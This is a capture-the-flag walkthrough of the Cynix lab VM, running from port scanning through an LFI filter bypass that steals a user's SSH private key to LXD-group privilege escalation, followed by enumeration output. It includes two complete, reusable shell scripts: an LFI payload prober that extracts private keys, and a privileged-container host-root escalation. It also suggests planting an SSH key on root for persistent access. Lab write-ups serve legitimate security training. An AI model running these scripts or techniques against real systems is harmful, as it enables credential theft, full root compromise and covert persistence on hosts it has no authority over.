Cynix is a Boot2Root machine. The machine is VirtualBox compatible but can be used in VMWare as well (not tested, but it should work). DHCP will assign an IP automatically. You have to find and read two flags (user and root), which are stored in user.txt and root.txt respectively.
Vulnerable Machine Name: Cynix
Vulnerable Machine VM: VirtualBox
Vulnerable Machine Network: 192.168.56.101
Attacker Machine: Kali Linux 2019.4 (Running on vmwar
Vulnerable Machine VM: VMWare
Vulnerable Machine Network: 192.168.56.102
3. Host Discovery
We begin by trying to locate the IP address of our target. To do this we use nmap with the following command: nmap -sn 192.168.56.0/24
# Command breaks down as follows
-sn # This option tells Nmap not to do a port scan after host discovery, and only print out the available hosts that responded to the host discovery probes. This is often known as a “ping scan”
192.168.56.0/24 # IP range
As can be seen from Figure 3, our target is going to be either 192.168.56.100 or 192.168.56.101. Having identified our potential targets, we run a full TCP port scan to identify any open ports and running services with the following command: nmap -sS -A -T4 -p- 192.168.56.100-101
# Command breaks down as follows
-sS # TCP SYN ("stealth") scan; needs root because it crafts raw packets
-A # OS and version detection + traceroute and default scripts
-T4 # aggressive timing template, fine on a local lab network
-p- # all 65535 TCP ports instead of nmap's default top 1000, so nothing on a non-standard port is missed
192.168.56.100-101 # IP range
As can be seen from Figure 4, there is nothing running on 192.168.56.100 (that is the default address of the VirtualBox host-only DHCP server), so our Cynix box is almost certainly 192.168.56.101, with services on ports 80 and 6688.
4. Service Enumeration
As seen in Figure 4, our host is running an Apache web server on port 80 and an SSH server on the non-standard port 6688.
As can be seen from Figure 5, browsing to http://192.168.56.101 gives us only the Apache2 default page, so we continue with a directory brute force using the following command:
gobuster dir -u http://192.168.56.101/ -w /usr/share/dirbuster/wordlists/directories.jbrofuzz
NOTE: Several wordlists were tried before finding one that contained the valid directory (lavalamp).
Browsing to the lavalamp directory we are met with the web page shown in Figure 7. After some digging and reviewing the intercepted requests and responses we see that the contact form makes a POST request to another page - Figure 8, Figure 9.
Reviewing the response to that same request we notice a second form, hidden inside the page by an inline opacity style (opacity: 0:0 in the response).
Hiding a form client-side provides no security at all and is more of a nuisance than anything else: the browser still receives it and will still submit it. Using Burp's Proxy match-and-replace rules we can replace any response body containing opacity: 0:0; with opacity: 1:0; so that the form is rendered.
Filling out the contact form again, the previously hidden form is now visible.
After we enter an integer and click the download button we are redirected to a new web page - Figure 13.
Next we provide sample text in both boxes and review the request and response to get a better idea of what is happening in the background:
As can be seen from Figure 14, the application POSTs two parameters, file and read, to the server.
5. Local File Inclusion
As can be seen from Figure 14, the file parameter could indicate a local file inclusion vulnerability. To test this we replace the original parameter value file=1 with file=../../../etc/passwd and check the response.
The response is a message telling us that we are not allowed to do that. A custom refusal is a strong hint that we are on to something, so we try again with the traversal prefixed by the original value: file=1../../../etc/passwd.
Success! The response contains /etc/passwd (Figure 15). The filter is evidently applied to the raw parameter string rather than to the path that ends up being opened, and a leading 1 is enough to get past it. The passwd file shows a user called ford. Remembering that an SSH service is also running, we check ford's .ssh directory for a private key.
As can be seen from Figure 16, we have retrieved the private SSH key belonging to ford. (The LSE output later in this write-up shows /home/ford/.ssh/id_rsa is mode 644, which is why the web server's user could read it; a properly protected key is mode 600.)
6. Getting Low Priv Shell
Our next step is to log in to the system using that key. First we copy the key into a file - Figure 17.
Next we restrict the file permissions with chmod 600 key (ssh refuses to use a private key that is readable by others).
Finally we log in with the key, remembering that sshd is listening on port 6688: ssh -i key ford@192.168.56.101 -p 6688
As can be seen from Figure 19, we have obtained a low privilege shell on the system and captured the user.txt flag.
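The LFI probing of section 5 and the key retrieval of section 6, as one script. This is an added example and not code from the write-up: the POST endpoint (LFI_URL, defaulting to the lavalamp directory, since the page shows the real action only in a figure), the value sent for read, and the exact wording of the refusal message are assumptions. It generates both traversal variants (the plain one the filter rejected and the 1-prefixed bypass) at several depths, classifies each response, cuts the PEM block out of the HTML and saves it with the permissions ssh requires.

```shell
#!/bin/sh
# Added example, not the write-up's own code: probe the lavalamp download form
# for LFI with the payload variants from section 5, then pull ford's key.
# Assumptions (not on the page): the POST endpoint is $LFI_URL, the refusal
# text contains "not allowed", and read=1 is an acceptable value.
LFI_URL="${LFI_URL:-http://192.168.56.101/lavalamp/}"   # assumed endpoint
LFI_READ="${LFI_READ:-1}"                                # assumed value for "read"
BLOCK_PATTERN="${BLOCK_PATTERN:-not allowed}"            # assumed refusal substring

# Candidate values for "file" for one absolute path, shallow to deep: the plain
# traversal the filter rejected, then the "1" prefix that slipped past it.
lfi_payloads() {
    rel="${1#/}"            # /etc/passwd -> etc/passwd
    traversal=""
    depth=1
    while [ "$depth" -le 6 ]; do
        traversal="${traversal}../"
        printf '%s%s\n' "$traversal" "$rel"
        printf '1%s%s\n' "$traversal" "$rel"
        depth=$((depth + 1))
    done
}

# Classify one response body: "hit" when the signature we expect in the target
# file appears, "blocked" when the application's refusal text appears, else "miss".
lfi_classify() {
    body="$1"; signature="$2"
    case "$body" in
        *"$signature"*)     echo hit ;;
        *"$BLOCK_PATTERN"*) echo blocked ;;
        *)                  echo miss ;;
    esac
}

# Strip HTML tags and keep only the PEM block, so the output can be fed to ssh -i.
extract_pem() {
    sed 's/<[^>]*>//g' | sed -n '/-----BEGIN [A-Z ]*PRIVATE KEY-----/,/-----END [A-Z ]*PRIVATE KEY-----/p'
}

# POST each payload until one returns the signature; that body goes to stdout,
# the per-payload verdicts to stderr. Needs network access to $LFI_URL.
lfi_probe() {
    target="$1"; signature="$2"
    for payload in $(lfi_payloads "$target"); do
        body=$(curl -s --data-urlencode "file=$payload" --data-urlencode "read=$LFI_READ" "$LFI_URL")
        verdict=$(lfi_classify "$body" "$signature")
        printf '%-8s %s\n' "$verdict" "$payload" >&2
        if [ "$verdict" = hit ]; then
            printf '%s\n' "$body"
            return 0
        fi
    done
    return 1
}

# Section 6 in one go: confirm the LFI, read the key, save it with mode 600.
lfi_get_key() {
    lfi_probe /etc/passwd 'root:x:0:0' >/dev/null || return 1
    body=$(lfi_probe /home/ford/.ssh/id_rsa 'PRIVATE KEY-----') || return 1
    printf '%s\n' "$body" | extract_pem > key
    [ -s key ] || return 1
    chmod 600 key
    echo "ssh -i key -p 6688 ford@192.168.56.101"
}

# Usage: LFI_URL=http://192.168.56.101/lavalamp/<form action> sh lfi.sh get-key
if [ "${1:-}" = get-key ]; then
    lfi_get_key
fi
```

The depth loop is deliberate: the write-up needed three ../ from the directory the application includes from, and a different layout needs a different count, so the script stops at the first depth that returns the expected content rather than assuming one. Verdicts go to stderr so the body can be redirected cleanly.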
7. More Enumeration
Next we run python -m SimpleHTTPServer on our attacking machine so that we can download the linux-smart-enumeration tool (lse.sh) onto the target with wget from within our ssh session.
Next we make the file executable with chmod +x lse.sh, run it at verbosity level 1 and get the following output:
ford@blume:~$ ./lse.sh -l 1
---
If you know the current user password, write it here for better results:
---
LSE Version: 1.16
User: ford
User ID: 1000
Password: none
Home: /home/ford
Path: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
umask: 0022
Hostname: blume
Linux: 4.15.0-66-generic
Distribution: Ubuntu 18.04.3 LTS
Architecture: x86_64
==================================================================( users )=====
[i] usr000 Current user groups............................................. yes!
[*] usr010 Is current user in an administrative group?..................... nope
[*] usr020 Are there other users in an administrative groups?.............. nope
[*] usr030 Other users with shell.......................................... yes!
---
root:x:0:0:root:/root:/bin/bash
ford:x:1000:1000:ford,,,:/home/ford:/bin/bash
---
[i] usr040 Environment information......................................... skip
[i] usr050 Groups for other users.......................................... skip
[i] usr060 Other users..................................................... skip
[*] usr070 PATH variables defined inside /etc.............................. yes!
---
/bin
/sbin
/usr/bin
/usr/games
/usr/local/bin
/usr/local/games
/usr/local/sbin
/usr/sbin
---
[!] usr080 Is '.' in a PATH variable defined inside /etc?.................. nope
===================================================================( sudo )=====
[!] sud000 Can we sudo without a password?................................. nope
[!] sud010 Can we list sudo commands without a password?................... nope
[*] sud040 Can we read /etc/sudoers?....................................... nope
[*] sud050 Do we know if any other users used sudo?........................ yes!
---
ford
---
============================================================( file system )=====
[*] fst000 Writable files outside user's home.............................. yes!
---
/var/lib/lxd/devlxd/sock
/var/lib/lxd/unix.socket
/var/lib/lxcfs/proc
/var/lib/lxcfs/cgroup
/var/lib/php/sessions
/var/www/html/lavalamp/css/bootstrap.css
/var/www/html/lavalamp/css/isotope.css
/var/www/html/lavalamp/css/flexslider.css
/var/www/html/lavalamp/css/animate.css
/var/www/html/lavalamp/css/overwrite.css
/var/www/html/lavalamp/css/style.css
/var/www/html/lavalamp/css/font-awesome.css
/var/www/html/lavalamp/css/icon-component.css
/var/www/html/lavalamp/js/jquery.isotope.min.js
/var/www/html/lavalamp/js/stellar.js
/var/www/html/lavalamp/js/jquery.flexslider-min.js
/var/www/html/lavalamp/js/fancybox/fancybox_sprite_402x.png
/var/www/html/lavalamp/js/fancybox/fancybox_overlay.png
/var/www/html/lavalamp/js/fancybox/fancybox_loading.gif
/var/www/html/lavalamp/js/fancybox/Descr.WD3
/var/www/html/lavalamp/js/fancybox/blank.gif
/var/www/html/lavalamp/js/fancybox/jquery.fancybox.css
/var/www/html/lavalamp/js/fancybox/fancybox_sprite.png
/var/www/html/lavalamp/js/fancybox/jquery.fancybox.pack.js
/var/www/html/lavalamp/js/fancybox/fancybox_loading_402x.gif
/var/www/html/lavalamp/js/jquery.scrollTo.min.js
/var/www/html/lavalamp/js/modernizr-2.6.2-respond-1.1.0.min.js
/var/www/html/lavalamp/js/skrollr.min.js
/var/www/html/lavalamp/js/jquery.js
/var/www/html/lavalamp/js/jquery.easing.1.3.js
/var/www/html/lavalamp/js/jquery.nicescroll.min.js
/var/www/html/lavalamp/js/jquery.appear.js
/var/www/html/lavalamp/js/jquery.scrollTo-1.4.3.1-min.js
/var/www/html/lavalamp/js/jquery.localScroll.min.js
/var/www/html/lavalamp/js/main.js
/var/www/html/lavalamp/js/bootstrap.min.js
/var/www/html/lavalamp/contactform/contactform.js
/var/www/html/lavalamp/contactform/Readme.txt
/var/www/html/lavalamp/index.html
/var/www/html/lavalamp/fonts/flexslider/flexslider-icon.eot@
/var/www/html/lavalamp/fonts/flexslider/flexslider-icon.woff
/var/www/html/lavalamp/fonts/flexslider/flexslider-icon.eot
/var/www/html/lavalamp/fonts/flexslider/flexslider-icon.svg
/var/www/html/lavalamp/fonts/flexslider/flexslider-icon.ttf
/var/www/html/lavalamp/fonts/glyphicons-halflings-regular.ttf
/var/www/html/lavalamp/fonts/fontawesome/fontawesome-webfont.svg
/var/www/html/lavalamp/fonts/fontawesome/fontawesome-webfont.ttf
/var/www/html/lavalamp/fonts/fontawesome/fontawesome-webfont.eot
/var/www/html/lavalamp/fonts/fontawesome/FontAwesome.otf
/var/www/html/lavalamp/fonts/fontawesome/fontawesome-webfont.woff
/var/www/html/lavalamp/fonts/glyphicons-halflings-regular.eot
/var/www/html/lavalamp/fonts/glyphicons-halflings-regular.woff
/var/www/html/lavalamp/fonts/codropsicons/codropsicons.svg
/var/www/html/lavalamp/fonts/codropsicons/codropsicons.woff
/var/www/html/lavalamp/fonts/codropsicons/codropsicons.eot
/var/www/html/lavalamp/fonts/codropsicons/codropsicons.ttf
/var/www/html/lavalamp/fonts/codropsicons/license.txt
/var/www/html/lavalamp/fonts/glyphicons-halflings-regular.svg
/var/www/html/lavalamp/fonts/ecoicons/ecoicon.svg
/var/www/html/lavalamp/fonts/ecoicons/ecoicon.ttf
/var/www/html/lavalamp/fonts/ecoicons/ecoicon.woff
/var/www/html/lavalamp/fonts/ecoicons/ecoicon.eot
/var/www/html/lavalamp/fonts/ecoicons/ecoicon.dev.svg
/var/www/html/lavalamp/fonts/glyphicons-halflings-regular.eot@
/var/www/html/lavalamp/skin/default.css
/var/www/html/lavalamp/img/arrow_small_left.png
/var/www/html/lavalamp/img/logo.png
/var/www/html/lavalamp/img/parallax/img3.jpg
/var/www/html/lavalamp/img/parallax/img1.jpg
/var/www/html/lavalamp/img/team/member1.jpg
/var/www/html/lavalamp/img/team/member3.jpg
/var/www/html/lavalamp/img/team/member4.jpg
/var/www/html/lavalamp/img/team/member2.jpg
/var/www/html/lavalamp/img/testimonial/testimonial2.png
/var/www/html/lavalamp/img/testimonial/testimonial1.png
/var/www/html/lavalamp/img/testimonial/testimonial3.png
/var/www/html/lavalamp/img/clients/logo5.png
/var/www/html/lavalamp/img/clients/logo2.png
/var/www/html/lavalamp/img/clients/logo4.png
/var/www/html/lavalamp/img/clients/logo1.png
/var/www/html/lavalamp/img/clients/logo6.png
/var/www/html/lavalamp/img/clients/logo3.png
/var/www/html/lavalamp/img/arrow_small_right.png
/var/www/html/lavalamp/img/arrow_large_right.png
/var/www/html/lavalamp/img/arrow_large_left.png
/var/www/html/lavalamp/img/intro-background.jpg
/var/www/html/lavalamp/img/bullets-new.png
/var/www/html/lavalamp/Readme.txt
/var/tmp
/tmp
/tmp/.font-unix
/tmp/.X11-unix
/tmp/.Test-unix
/tmp/.XIM-unix
/tmp/suid.c
/tmp/.ICE-unix
---
[*] fst010 Binaries with setuid bit........................................ yes!
---
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/traceroute6.iputils
/bin/ping
/bin/su
/bin/mount
/bin/umount
/bin/fusermount
---
[!] fst020 Uncommon setuid binaries........................................ nope
[!] fst030 Can we write to any setuid binary?.............................. nope
[*] fst040 Binaries with setgid bit........................................ skip
[!] fst050 Uncommon setgid binaries........................................ skip
[!] fst060 Can we write to any setgid binary?.............................. skip
[*] fst070 Can we read /root?.............................................. nope
[*] fst080 Can we read subdirectories under /home?......................... nope
[*] fst090 SSH files in home directories................................... yes!
---
-rw-r--r-- 1 ford ford 392 Nov 8 15:22 /home/ford/.ssh/id_rsa.pub
-rw-r--r-- 1 ford ford 1675 Nov 8 15:22 /home/ford/.ssh/id_rsa
-rw-r--r-- 1 ford ford 392 Nov 8 15:22 /home/ford/.ssh/authorized_keys
---
[*] fst100 Useful binaries................................................. yes!
---
/usr/bin/dig
/bin/nc.openbsd
/bin/nc
/bin/netcat
/usr/bin/wget
---
[*] fst110 Other interesting files in home directories..................... nope
[!] fst120 Are there any credentials in fstab/mtab?........................ nope
[*] fst130 Does 'ford' have mail?.......................................... nope
[!] fst140 Can we access other users mail?................................. nope
[*] fst150 Looking for GIT/SVN repositories................................ nope
[!] fst160 Can we write to critical files?................................. nope
[!] fst170 Can we write to critical directories?........................... nope
[!] fst180 Can we write to directories from PATH defined in /etc?.......... nope
[i] fst500 Files owned by user 'ford'...................................... skip
[i] fst510 SSH files anywhere.............................................. skip
[i] fst520 Check hosts.equiv file and its contents......................... skip
[i] fst530 List NFS server shares.......................................... skip
[i] fst540 Dump fstab file................................................. skip
=================================================================( system )=====
[i] sys000 Who is logged in................................................ skip
[i] sys010 Last logged in users............................................ skip
[!] sys020 Does the /etc/passwd have hashes?............................... nope
[!] sys030 Can we read /etc/shadow file?................................... nope
[!] sys030 Can we read /etc/shadow- file?.................................. nope
[!] sys030 Can we read /etc/shadow~ file?.................................. nope
[!] sys030 Can we read /etc/master.passwd file?............................ nope
[*] sys040 Check for other superuser accounts.............................. nope
[*] sys050 Can root user log in via SSH?................................... nope
[i] sys060 List available shells........................................... skip
[i] sys070 System umask in /etc/login.defs................................. skip
[i] sys080 System password policies in /etc/login.defs..................... skip
===============================================================( security )=====
[*] sec000 Is SELinux present?............................................. nope
[*] sec010 List files with capabilities.................................... yes!
---
/usr/bin/mtr-packet = cap_net_raw+ep
---
[!] sec020 Can we write to a binary with caps?............................. nope
[!] sec030 Do we have all caps in any binary?.............................. nope
[*] sec040 Users with associated capabilities.............................. nope
[!] sec050 Does current user have capabilities?............................ skip
========================================================( recurrent tasks )=====
[*] ret000 User crontab.................................................... nope
[!] ret010 Cron tasks writable by user..................................... nope
[*] ret020 Cron jobs....................................................... yes!
---
/etc/crontab:SHELL=/bin/sh
/etc/crontab:PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
/etc/crontab:17 * * * * root cd / && run-parts --report /etc/cron.hourly
/etc/crontab:25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
/etc/crontab:47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
/etc/crontab:52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
/etc/cron.d/popularity-contest:SHELL=/bin/sh
/etc/cron.d/popularity-contest:PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
/etc/cron.d/popularity-contest:23 13 * * * root test -x /etc/cron.daily/popularity-contest && /etc/cron.daily/popularity-contest --crond
/etc/cron.d/php:09,39 * * * * root [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi
/etc/cron.d/zfsutils-linux:PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
/etc/cron.d/zfsutils-linux:24 0 8-14 * * root [ $(date +\%w) -eq 0 ] && [ -x /usr/lib/zfs-linux/scrub ] && /usr/lib/zfs-linux/scrub
---
[*] ret030 Can we read user crontabs....................................... nope
[*] ret040 Can we list other user cron tasks?.............................. nope
[*] ret050 Can we write to any paths present in cron jobs.................. yes!
---
/dev/null
/dev/urandom
---
[!] ret060 Can we write to executable paths present in cron jobs........... nope
[i] ret400 Cron files...................................................... skip
[*] ret500 User systemd timers............................................. nope
[!] ret510 Can we write in any system timer?............................... nope
[i] ret900 Systemd timers.................................................. skip
================================================================( network )=====
[*] net000 Services listening only on localhost............................ nope
[!] net010 Can we sniff traffic with tcpdump?.............................. nope
[i] net500 NIC and IP information.......................................... skip
[i] net510 Routing table................................................... skip
[i] net520 ARP table....................................................... skip
[i] net530 Namerservers.................................................... skip
[i] net540 Systemd Nameservers............................................. skip
[i] net550 Listening TCP................................................... skip
[i] net560 Listening UDP................................................... skip
===============================================================( services )=====
[!] srv000 Can we write in service files?.................................. nope
[!] srv010 Can we write in binaries executed by services?.................. nope
[*] srv020 Files in /etc/init.d/ not belonging to root..................... nope
[*] srv030 Files in /etc/rc.d/init.d not belonging to root................. nope
[*] srv040 Upstart files not belonging to root............................. nope
[*] srv050 Files in /usr/local/etc/rc.d not belonging to root.............. nope
[i] srv400 Contents of /etc/inetd.conf..................................... skip
[i] srv410 Contents of /etc/xinetd.conf.................................... skip
[i] srv420 List /etc/xinetd.d if used...................................... skip
[i] srv430 List /etc/init.d/ permissions................................... skip
[i] srv440 List /etc/rc.d/init.d permissions............................... skip
[i] srv450 List /usr/local/etc/rc.d permissions............................ skip
[i] srv460 List /etc/init/ permissions..................................... skip
[!] srv500 Can we write in systemd service files?.......................... nope
[!] srv510 Can we write in binaries executed by systemd services?.......... nope
[*] srv520 Systemd files not belonging to root............................. nope
[i] srv900 Systemd config files permissions................................ skip
==============================================================( processes )=====
[!] pro000 Can we write in any process binary?............................. nope
[*] pro010 Processes running with root permissions......................... yes!
---
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 Feb12 ? 00:00:01 /sbin/init splash
root 222 1 0 Feb12 ? 00:00:00 /lib/systemd/systemd-journald
root 236 1 0 Feb12 ? 00:00:00 /lib/systemd/systemd-udevd
root 511 1 0 Feb12 ? 00:00:00 /lib/systemd/systemd-logind
root 512 1 0 Feb12 ? 00:00:04 /usr/bin/lxcfs /var/lib/lxcfs/
root 515 1 0 Feb12 ? 00:00:00 /usr/sbin/zed -F
root 516 1 0 Feb12 ? 00:00:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 528 1 0 Feb12 ? 00:00:00 /usr/sbin/cron -f
root 563 1 0 Feb12 ? 00:00:00 /usr/lib/accountsservice/accounts-daemon
root 565 1 0 Feb12 ? 00:00:00 /usr/sbin/sshd -D
root 609 1 0 Feb12 tty1 00:00:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 698 1 0 Feb12 ? 00:00:00 /usr/sbin/apache2 -k start
root 749 1 0 Feb12 ? 00:00:01 /usr/lib/lxd/lxd --group lxd --logfile=/var/log/lxd/lxd.log
---
[i] pro500 Running processes............................................... skip
[i] pro510 Running process binaries and permissions........................ skip
===============================================================( software )=====
[!] sof000 Can we connect to MySQL with root/root credentials?............. nope
[!] sof010 Can we connect to MySQL as root without password?............... nope
[!] sof020 Can we connect to PostgreSQL template0 as postgres and no pass?. nope
[!] sof020 Can we connect to PostgreSQL template1 as postgres and no pass?. nope
[!] sof020 Can we connect to PostgreSQL template0 as psql and no pass?..... nope
[!] sof020 Can we connect to PostgreSQL template1 as psql and no pass?..... nope
[*] sof030 Installed apache modules........................................ yes!
---
Loaded Modules:
core_module (static)
so_module (static)
watchdog_module (static)
http_module (static)
log_config_module (static)
logio_module (static)
version_module (static)
unixd_module (static)
access_compat_module (shared)
alias_module (shared)
auth_basic_module (shared)
authn_core_module (shared)
authn_file_module (shared)
authz_core_module (shared)
authz_host_module (shared)
authz_user_module (shared)
autoindex_module (shared)
deflate_module (shared)
dir_module (shared)
env_module (shared)
filter_module (shared)
mime_module (shared)
mpm_prefork_module (shared)
negotiation_module (shared)
php7_module (shared)
reqtimeout_module (shared)
setenvif_module (shared)
status_module (shared)
---
[!] sof040 Found any .htpasswd files?...................................... nope
[i] sof500 Sudo version.................................................... skip
[i] sof510 MySQL version................................................... skip
[i] sof520 Postgres version................................................ skip
[i] sof530 Apache version.................................................. skip
=============================================================( containers )=====
[*] ctn000 Are we in a docker container?................................... nope
[*] ctn010 Is docker available?............................................ nope
[!] ctn020 Is the user a member of the 'docker' group?..................... nope
[*] ctn200 Are we in a lxc container?...................................... nope
[!] ctn210 Is the user a member of any lxc/lxd group?...................... yes!
---
ford cdrom dip plugdev lpadmin sambashare lxd
---
==================================( FINISHED )==================================
The piece we are particularly interested in is the ctn210 result under containers: ford is a member of the lxd group.
8. LXD Privilege Escalation
LXD is a root process that carries out actions for anyone with write access to the LXD UNIX socket. It often does not attempt to match the privileges of the calling user. Membership of the lxd group grants exactly that access (the fst000 output above lists /var/lib/lxd/unix.socket among the files we can write to), so any member can create a privileged container, attach the host's filesystem to it and act as root on the host. This is what we abuse to escalate our privileges.
In order to carry out this attack we need to perform the following steps:
Steps to be performed on the attacker machine:
Download build-alpine from its git repository on your local machine.
Execute the build-alpine script, which builds the latest Alpine image as a compressed tar file; this step must be run as root.
Transfer the tar file to the victim machine.
Steps to be performed on the victim machine:
Download the Alpine image.
Import the image into LXD.
Initialise a privileged container from the image.
Add the host's root filesystem (/) to the container as a disk device, so that it is mounted inside the container.
8.1 Steps to be performed on the attacker machine:
Our first step is to download and build an Alpine image - Figure 23.
Next we transfer it to the victim machine - Figure 24.
8.2 Steps to be performed on the victim machine:
Our first step is to download the tar file from the attacker machine - Figure 25.
Next we import the image into LXD - Figure 26.
Next we initialise a privileged container from the image - Figure 27.
Next we attach the host's root filesystem to the container as a disk device; this is the step that gives root inside the container a view of the host's files - Figure 28.
Our final step is to start the container and execute a shell inside it - Figure 29.
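The victim-side steps of 8.2 as one script. This is an added example and not the write-up's own commands (those are only in its figures): it assumes the Alpine tarball produced by build-alpine has already been fetched to the victim (for instance with wget from the SimpleHTTPServer used earlier) and is passed as the first argument, that the lxc client is on PATH, and that the current user is in the lxd group; the image alias, container name and mount point are ours. DRY_RUN=1 prints the commands instead of running them.

```shell
#!/bin/sh
# Added example, not the write-up's own commands: the victim-side LXD steps of
# section 8.2 as one script. Assumptions: $1 is the Alpine tarball already on
# the victim; lxc is on PATH and we are in the lxd group; alias, container and
# mount names are ours. DRY_RUN=1 prints the commands instead of running them.
set -u

IMAGE_ALIAS=alpine-priv
CONTAINER=privesc
HOST_MOUNT=/mnt/root     # where the host's / will appear inside the container

# Print the command in dry-run mode, otherwise execute it.
run() {
    if [ "${DRY_RUN:-0}" = 1 ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

lxd_escalate() {
    image="$1"
    # A fresh install may have no storage pool or bridge yet; --auto takes defaults.
    if [ -z "$(lxc storage list --format csv 2>/dev/null)" ]; then
        run lxd init --auto
    fi
    run lxc image import "$image" --alias "$IMAGE_ALIAS"
    # security.privileged=true: uid 0 in the container is uid 0 on the host, so
    # anything we write on the mounted host filesystem is written as host root.
    run lxc init "$IMAGE_ALIAS" "$CONTAINER" -c security.privileged=true
    # The "mount" step of section 8: the host's whole filesystem becomes a disk
    # device of the container; recursive=true carries submounts along.
    run lxc config device add "$CONTAINER" hostroot disk source=/ path="$HOST_MOUNT" recursive=true
    run lxc start "$CONTAINER"
    # Inside, the flag is at $HOST_MOUNT/root/root.txt, not /root/root.txt.
    run lxc exec "$CONTAINER" -- /bin/sh
}

if [ "$#" -gt 0 ]; then
    lxd_escalate "$1"
fi
```

Once the shell opens, cat /mnt/root/root/root.txt reads the flag. Because the container is privileged, the same mount also allows writes as host root (for example appending a public key to /mnt/root/root/.ssh/authorized_keys), which turns the container shell into a persistent root login on the host itself. On this box LXD is the Ubuntu 18.04 deb package (the /var/lib/lxd paths in the LSE output); with the snap package the lxd binary lives under /snap/bin instead.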
9. Capturing Root.txt
Having gained a root shell inside the container we can now retrieve the root.txt flag. Note that the host's filesystem is visible under the mount point chosen in the previous step, so the flag is read from root/root.txt beneath that mount point rather than from /root inside the container: